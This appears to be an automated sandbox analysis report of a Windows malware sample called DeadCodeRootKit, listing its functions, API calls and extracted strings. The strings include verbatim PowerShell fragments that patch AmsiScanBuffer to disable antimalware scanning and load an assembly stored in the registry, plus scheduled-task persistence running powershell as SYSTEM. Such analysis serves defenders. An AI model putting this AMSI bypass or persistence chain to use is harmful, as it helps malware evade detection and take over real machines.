                                                        control_flow_graph 152 b017a6-b017c0 FindResourceA 153 b01863-b01868 152->153 154 b017c6-b017d3 SizeofResource 152->154 155 b01862 154->155 156 b017d9-b017e3 LoadResource 154->156 155->153 156->155 157 b017e5-b0180a LockResource RegOpenKeyExW 156->157 157->155 158 b0180c-b01821 RegSetValueExW 157->158 158->155 159 b01823-b01859 call b01869 call b01672 * 2 call b0112d call b011ab 158->159 159->155 170 b0185b-b0185d call b01518 159->170 170->155
                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 00B017B6
                                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B017C9
                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B017DB
                                                        • LockResource.KERNEL32(00000000,?,?,?,?,?,00B0179E), ref: 00B017E6
                                                        • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,00B0179E), ref: 00B01802
                                                        • RegSetValueExW.KERNELBASE(?,Deadstager,00000000,00000003,00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B01819
                                                          • Part of subcall function 00B01869: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00B01828,?,?,?,?,?,00B0179E), ref: 00B01873
                                                          • Part of subcall function 00B01869: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00B0179E), ref: 00B0187A
                                                          • Part of subcall function 00B01869: StrCpyW.SHLWAPI(00000000,00B02230), ref: 00B01889
                                                          • Part of subcall function 00B01869: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 00B018A4
                                                          • Part of subcall function 00B01869: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 00B018BC
                                                          • Part of subcall function 00B01869: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 00B018C4
                                                          • Part of subcall function 00B01869: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`Deadstager`)).EntryPoint.Inv), ref: 00B018CC
                                                          • Part of subcall function 00B01869: StrCatW.SHLWAPI(00000000,00B02230), ref: 00B018D0
                                                          • Part of subcall function 00B01672: SysAllocString.OLEAUT32(Deadsvc32), ref: 00B01684
                                                          • Part of subcall function 00B01672: SysAllocString.OLEAUT32(00B0218C), ref: 00B0168E
                                                          • Part of subcall function 00B01672: CoInitializeEx.COMBASE(00000000,00000000), ref: 00B01697
                                                          • Part of subcall function 00B01672: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B016B1
                                                          • Part of subcall function 00B01672: CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B016DC
                                                          • Part of subcall function 00B01672: VariantInit.OLEAUT32(?), ref: 00B016EE
                                                          • Part of subcall function 00B01672: CoUninitialize.COMBASE ref: 00B0177B
                                                          • Part of subcall function 00B01672: SysFreeString.OLEAUT32(?), ref: 00B0178D
                                                          • Part of subcall function 00B01672: SysFreeString.OLEAUT32(00000000), ref: 00B01790
                                                          • Part of subcall function 00B0112D: GetCurrentProcess.KERNEL32(?,00000000,?,?,00B018AB,?,?,?,?,?,00B0179E), ref: 00B0113B
                                                          • Part of subcall function 00B0112D: IsWow64Process.KERNEL32(00000000,?,?,00B018AB,?,?,?,?,?,00B0179E), ref: 00B01142
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(Deadsvc64), ref: 00B011C0
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(00B0222C), ref: 00B011CA
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(powershell), ref: 00B011D6
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(?), ref: 00B011DE
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(00B0218C), ref: 00B011E8
                                                          • Part of subcall function 00B011AB: SysAllocString.OLEAUT32(SYSTEM), ref: 00B011F2
                                                          • Part of subcall function 00B011AB: CoInitializeEx.COMBASE(00000000,00000000), ref: 00B011F9
                                                          • Part of subcall function 00B011AB: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B01213
                                                          • Part of subcall function 00B011AB: CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B0123C
                                                          • Part of subcall function 00B011AB: VariantInit.OLEAUT32(?), ref: 00B0124E
                                                          • Part of subcall function 00B01518: SysAllocString.OLEAUT32(Deadsvc64), ref: 00B0152A
                                                          • Part of subcall function 00B01518: SysAllocString.OLEAUT32(00B0218C), ref: 00B01536
                                                          • Part of subcall function 00B01518: CoInitializeEx.OLE32(00000000,00000000), ref: 00B0153D
                                                          • Part of subcall function 00B01518: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B01557
                                                          • Part of subcall function 00B01518: CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B01580
                                                          • Part of subcall function 00B01518: VariantInit.OLEAUT32(?), ref: 00B01592
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
                                                        • String ID: Deadstager$Deadsvc32$Deadsvc64$EXE$SOFTWARE
                                                        • API String ID: 2402434814-3166964389
                                                        • Opcode ID: 42b7a81cef5b3601d0ca8e9e6507b6e40d5cd92b0477f464f805bc1186e3b8e9
                                                        • Instruction ID: b992e5bb7bc6b6ec05ed5b8e45cdfe4d4bb6aa207cf97383213c4968b53b6420
                                                        • Opcode Fuzzy Hash: 42b7a81cef5b3601d0ca8e9e6507b6e40d5cd92b0477f464f805bc1186e3b8e9
                                                        • Instruction Fuzzy Hash: 8A1173717003146EE719277A9C9DE3B3DDEDB95B94B0448E9B906E71D1EE20CE0881B0
                                                        Function 00B01672 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131memorycomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 172 b01672-b0169f SysAllocString * 2 CoInitializeEx 173 b01783 172->173 174 b016a5-b016b9 CoInitializeSecurity 172->174 177 b01786-b01798 SysFreeString * 2 173->177 175 b016c6-b016e4 CoCreateInstance 174->175 176 b016bb-b016c0 174->176 178 b01778 175->178 179 b016ea-b01729 VariantInit 175->179 176->175 176->178 180 b0177b-b01781 CoUninitialize 178->180 181 b0172d-b01732 179->181 180->177 182 b01734-b0174a 181->182 183 b0176a 181->183 184 b0176d-b01776 182->184 187 b0174c-b01768 182->187 183->184 184->180 187->184
                                                        APIs
                                                        • SysAllocString.OLEAUT32(Deadsvc32), ref: 00B01684
                                                        • SysAllocString.OLEAUT32(00B0218C), ref: 00B0168E
                                                        • CoInitializeEx.COMBASE(00000000,00000000), ref: 00B01697
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B016B1
                                                        • CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B016DC
                                                        • VariantInit.OLEAUT32(?), ref: 00B016EE
                                                        • CoUninitialize.COMBASE ref: 00B0177B
                                                        • SysFreeString.OLEAUT32(?), ref: 00B0178D
                                                        • SysFreeString.OLEAUT32(00000000), ref: 00B01790
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID: Deadsvc32
                                                        • API String ID: 4184240511-3318990577
                                                        • Opcode ID: 6472a1fd3a17b3052e3fcf758df704ebea1d3c3ba32354f369288e9bdcb3e413
                                                        • Instruction ID: a397a0fde7034f7d47ecde5170f9faa44d524cf5bdf96cae5f2a67e1759d7108
                                                        • Opcode Fuzzy Hash: 6472a1fd3a17b3052e3fcf758df704ebea1d3c3ba32354f369288e9bdcb3e413
                                                        • Instruction Fuzzy Hash: EC417271E00218AFDB05DFA8DC889AF7BBDEF49754B104498F905EB150DA71AD05CBA0
                                                        Function 00B01000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37encryptionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 190 b01000-b01028 CryptAcquireContextW 191 b01048-b0104e 190->191 192 b0102a-b01042 CryptGenRandom CryptReleaseContext 190->192 192->191
                                                        APIs
                                                        • CryptAcquireContextW.ADVAPI32(00B01A30,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00B01A30), ref: 00B01020
                                                        • CryptGenRandom.ADVAPI32(00B01A30,00004000,00000000,?,00B01A30), ref: 00B0102F
                                                        • CryptReleaseContext.ADVAPI32(00B01A30,00000000,?,00B01A30), ref: 00B01042
                                                        Strings
                                                        • Microsoft Base Cryptographic Provider v1.0, xrefs: 00B01014
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                        • String ID: Microsoft Base Cryptographic Provider v1.0
                                                        • API String ID: 1815803762-291530887
                                                        • Opcode ID: 1b291db2f314329a3eb20d4a341a93e42dc0cbec357c079b7e33c3a1ed2a69b3
                                                        • Instruction ID: 8b3596a5eda456252a4fdc9414b55a39ec001b2052322915728c092b40fdd4e4
                                                        • Opcode Fuzzy Hash: 1b291db2f314329a3eb20d4a341a93e42dc0cbec357c079b7e33c3a1ed2a69b3
                                                        • Instruction Fuzzy Hash: 6FF06572700314BFFB2487E59D4DFAB7AEDDB95791F104465BA01E3190FAA0DD04D660
                                                        Function 00B01869 Relevance: 47.3, APIs: 8, Strings: 19, Instructions: 86memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00B01828,?,?,?,?,?,00B0179E), ref: 00B01873
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00B0179E), ref: 00B0187A
                                                        • StrCpyW.SHLWAPI(00000000,00B02230), ref: 00B01889
                                                        • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 00B018A4
                                                          • Part of subcall function 00B0112D: GetCurrentProcess.KERNEL32(?,00000000,?,?,00B018AB,?,?,?,?,?,00B0179E), ref: 00B0113B
                                                          • Part of subcall function 00B0112D: IsWow64Process.KERNEL32(00000000,?,?,00B018AB,?,?,?,?,?,00B0179E), ref: 00B01142
                                                        • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 00B018BC
                                                        • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 00B018C4
                                                        • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`Deadstager`)).EntryPoint.Inv), ref: 00B018CC
                                                        • StrCatW.SHLWAPI(00000000,00B02230), ref: 00B018D0
                                                        Strings
                                                        • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 00B018B6
                                                        • VirtualProtectPtr, xrefs: 00B01951
                                                        • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`Deadstager`)).EntryPoint.Inv, xrefs: 00B018C6
                                                        • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 00B0189E
                                                        • NativeMethods, xrefs: 00B01909
                                                        • AmsiScanBufferPtr, xrefs: 00B01969
                                                        • LoadLibraryPtr, xrefs: 00B01945
                                                        • TypeBuilder, xrefs: 00B018FD
                                                        • OldProtect, xrefs: 00B01975
                                                        • VirtualProtectDelegate, xrefs: 00B0192D
                                                        • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 00B018AF
                                                        • Get-Delegate, xrefs: 00B018D9
                                                        • ParameterTypes, xrefs: 00B018E5
                                                        • ReturnType, xrefs: 00B018F1
                                                        • LoadLibraryDelegate, xrefs: 00B01921
                                                        • AmsiPtr, xrefs: 00B0195D
                                                        • Kernel32Ptr, xrefs: 00B01939
                                                        • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 00B018BE
                                                        • GetProcAddress, xrefs: 00B01915
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: Process$Heap$AllocCurrentWow64
                                                        • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`Deadstager`)).EntryPoint.Inv$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                        • API String ID: 2666690646-2533166174
                                                        • Opcode ID: c895c845931ec100b1f463e3fa26534c881cacbe28fb9c0dac66ba17f1725679
                                                        • Instruction ID: 130fce0b09ed9e338bd0ed571a6f6d359f86269d33f5b814bffa55fcd8e1cab3
                                                        • Opcode Fuzzy Hash: c895c845931ec100b1f463e3fa26534c881cacbe28fb9c0dac66ba17f1725679
                                                        • Instruction Fuzzy Hash: 5B21CFD13015A427DE0E33A9086ED2EADDE8BE2F4472084E4F0415BBD5CE1A8F0783DA
                                                        Function 00B011AB Relevance: 42.4, APIs: 20, Strings: 4, Instructions: 356memorycomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 61 b011ab-b01201 SysAllocString * 6 CoInitializeEx 62 b01207-b0121b CoInitializeSecurity 61->62 63 b014ee 61->63 64 b01228-b01244 CoCreateInstance 62->64 65 b0121d-b01222 62->65 66 b014f1-b01517 SysFreeString * 6 63->66 67 b014e3 64->67 68 b0124a-b0128f VariantInit 64->68 65->64 65->67 69 b014e6-b014ec CoUninitialize 67->69 71 b014d2 68->71 72 b01295-b012aa 68->72 69->66 73 b014d5-b014e1 71->73 72->71 76 b012b0-b012c3 72->76 73->69 78 b014c4 76->78 79 b012c9-b012db 76->79 80 b014c7-b014d0 78->80 82 b012e1-b012ee 79->82 83 b014b6 79->83 80->73 87 b012f4-b01300 82->87 88 b014a8 82->88 85 b014b9-b014c2 83->85 85->80 87->88 93 b01306-b01318 87->93 90 b014ab-b014b4 88->90 90->85 93->88 95 b0131e-b01334 93->95 97 b0149a 95->97 98 b0133a-b01350 95->98 99 b0149d-b014a6 97->99 102 b01356-b01368 98->102 103 b0148c 98->103 99->90 106 b0147e 102->106 107 b0136e-b01381 102->107 104 b0148f-b01498 103->104 104->99 109 b01481-b0148a 106->109 111 b01470 107->111 112 b01387-b0139d 107->112 109->104 114 b01473-b0147c 111->114 117 b01462 112->117 118 b013a3-b013b1 112->118 114->109 119 b01465-b0146e 117->119 122 b01454 118->122 123 b013b7-b013c5 118->123 119->114 124 b01457-b01460 122->124 123->122 126 b013cb-b013d9 123->126 124->119 126->122 129 b013db-b0143e VariantInit * 3 126->129 130 b01442-b01444 129->130 130->124 131 b01446-b01452 130->131 131->124
                                                        APIs
                                                        • SysAllocString.OLEAUT32(Deadsvc64), ref: 00B011C0
                                                        • SysAllocString.OLEAUT32(00B0222C), ref: 00B011CA
                                                        • SysAllocString.OLEAUT32(powershell), ref: 00B011D6
                                                        • SysAllocString.OLEAUT32(?), ref: 00B011DE
                                                        • SysAllocString.OLEAUT32(00B0218C), ref: 00B011E8
                                                        • SysAllocString.OLEAUT32(SYSTEM), ref: 00B011F2
                                                        • CoInitializeEx.COMBASE(00000000,00000000), ref: 00B011F9
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B01213
                                                        • CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B0123C
                                                        • VariantInit.OLEAUT32(?), ref: 00B0124E
                                                        • VariantInit.OLEAUT32(?), ref: 00B013E8
                                                        • VariantInit.OLEAUT32(?), ref: 00B013EE
                                                        • VariantInit.OLEAUT32(?), ref: 00B013FE
                                                        • CoUninitialize.COMBASE ref: 00B014E6
                                                        • SysFreeString.OLEAUT32(?), ref: 00B014F8
                                                        • SysFreeString.OLEAUT32(00000000), ref: 00B014FB
                                                        • SysFreeString.OLEAUT32(?), ref: 00B01500
                                                        • SysFreeString.OLEAUT32(?), ref: 00B01505
                                                        • SysFreeString.OLEAUT32(?), ref: 00B0150A
                                                        • SysFreeString.OLEAUT32(?), ref: 00B0150F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                        • String ID: Deadsvc32$Deadsvc64$SYSTEM$powershell
                                                        • API String ID: 3960698109-685761376
                                                        • Opcode ID: 775a7dcd5d66b487f7f8beb1649821786b7f6339b113fb56d6989f3783495802
                                                        • Instruction ID: 085dc1c71908af6d973c207d6aebb9f3bb431697aee6c1e2ccc123605ff04952
                                                        • Opcode Fuzzy Hash: 775a7dcd5d66b487f7f8beb1649821786b7f6339b113fb56d6989f3783495802
                                                        • Instruction Fuzzy Hash: 4AC1F771E00119AFDF04DFA9D9889AEBBF9FF49354B104498E905EB260DB71AE05CF60
                                                        Function 00B01518 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151memorycomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 133 b01518-b01545 SysAllocString * 2 CoInitializeEx 134 b0154b-b0155f CoInitializeSecurity 133->134 135 b0165d-b01671 SysFreeString * 2 133->135 136 b01561-b01566 134->136 137 b0156c-b01588 CoCreateInstance 134->137 136->137 138 b01657 CoUninitialize 136->138 137->138 139 b0158e-b015d3 VariantInit 137->139 138->135 141 b015d5-b015ea 139->141 142 b0164b-b01654 139->142 141->142 145 b015ec-b01601 141->145 142->138 147 b01642-b01646 145->147 148 b01603-b0162b VariantInit 145->148 147->142 150 b01639-b0163d 148->150 151 b0162d-b01634 148->151 150->147 151->150
                                                        APIs
                                                        • SysAllocString.OLEAUT32(Deadsvc64), ref: 00B0152A
                                                        • SysAllocString.OLEAUT32(00B0218C), ref: 00B01536
                                                        • CoInitializeEx.OLE32(00000000,00000000), ref: 00B0153D
                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B01557
                                                        • CoCreateInstance.OLE32(00B020A8,00000000,00000001,00B02088,?), ref: 00B01580
                                                        • VariantInit.OLEAUT32(?), ref: 00B01592
                                                        • VariantInit.OLEAUT32(?), ref: 00B01607
                                                        • CoUninitialize.COMBASE ref: 00B01657
                                                        • SysFreeString.OLEAUT32(00000000), ref: 00B01664
                                                        • SysFreeString.OLEAUT32(?), ref: 00B01669
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                        • String ID: Deadsvc32$Deadsvc64
                                                        • API String ID: 2407135876-806753349
                                                        • Opcode ID: 543a6ec4b3c6ae8dc14678402670cab475f8d471908d34dc8c4b2dbfff3e56ac
                                                        • Instruction ID: 9287d4316719b38f190d61e743da470350d43a9e458092ce5e47c21ac0860195
                                                        • Opcode Fuzzy Hash: 543a6ec4b3c6ae8dc14678402670cab475f8d471908d34dc8c4b2dbfff3e56ac
                                                        • Instruction Fuzzy Hash: 89413171E00219AFDB01DFA8DC889AFBBBDEF49314B144498F905EB250DA71AD45CBA0
                                                        Function 00B01987 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 193 b01987-b019b2 lstrlenW call b0104f 196 b019b4-b019be StrStrIW 193->196 197 b019de-b019e1 193->197 196->197 198 b019c0 196->198 199 b019c1-b019db StrStrIW 198->199 199->199 200 b019dd 199->200 200->197
                                                        APIs
                                                        • lstrlenW.KERNEL32(Get-Delegate,00000000,00B02230), ref: 00B0199A
                                                        • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 00B019B6
                                                        • StrStrIW.SHLWAPI(?,Get-Delegate,75B12EB0), ref: 00B019D3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: Get-Delegate
                                                        • API String ID: 1659193697-1365458365
                                                        • Opcode ID: fcad9cf41d18166cd7fe7b656fd62e3ad064be85e67adbf2caad615e74319b52
                                                        • Instruction ID: 3d6765d67db00a63c56ce458f6de2550116e1a9bcad23fc1dd317e58cfb8dbfa
                                                        • Opcode Fuzzy Hash: fcad9cf41d18166cd7fe7b656fd62e3ad064be85e67adbf2caad615e74319b52
                                                        • Instruction Fuzzy Hash: 3DF05471B00219ABDB249BA99D487AEBBFDEF44384F0000A6E509F3150FE709E06C6A0
                                                        Function 00B01799 Relevance: 3.0, APIs: 2, Instructions: 3COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 209 b01799-b0179f call b017a6 ExitProcess
                                                        APIs
                                                          • Part of subcall function 00B017A6: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 00B017B6
                                                          • Part of subcall function 00B017A6: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B017C9
                                                          • Part of subcall function 00B017A6: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B017DB
                                                          • Part of subcall function 00B017A6: LockResource.KERNEL32(00000000,?,?,?,?,?,00B0179E), ref: 00B017E6
                                                          • Part of subcall function 00B017A6: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,00B0179E), ref: 00B01802
                                                          • Part of subcall function 00B017A6: RegSetValueExW.KERNELBASE(?,Deadstager,00000000,00000003,00000000,00000000,?,?,?,?,?,00B0179E), ref: 00B01819
                                                        • ExitProcess.KERNEL32 ref: 00B0179F
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                        • String ID:
                                                        • API String ID: 3836967525-0
                                                        • Opcode ID: 2c155d8ae0ddda3e82cbe6d2ee6283a665921b915cd2446f52ea811bc906a3a1
                                                        • Instruction ID: 09ff60b56266a7afc6ea845f5dc7bac3953be539f21b674973b811773efe385f
                                                        • Opcode Fuzzy Hash: 2c155d8ae0ddda3e82cbe6d2ee6283a665921b915cd2446f52ea811bc906a3a1
                                                        • Instruction Fuzzy Hash:

                                                        Non-executed Functions

                                                        Function 00B0118C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 212 b0118c-b01199 GetModuleHandleA 213 b011a8-b011aa 212->213 214 b0119b-b011a7 GetProcAddress 212->214
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,00B01176,?), ref: 00B01191
                                                        • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00B011A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: RtlGetVersion$ntdll.dll
                                                        • API String ID: 1646373207-1489217083
                                                        • Opcode ID: 866f889c558d675e83477d6203bfdabd72d7f9d43e900279403a965f474cab53
                                                        • Instruction ID: a70f3d5828a9bb2ed224a698464ac569cc7196527bc4805cd1323b6965f12f6f
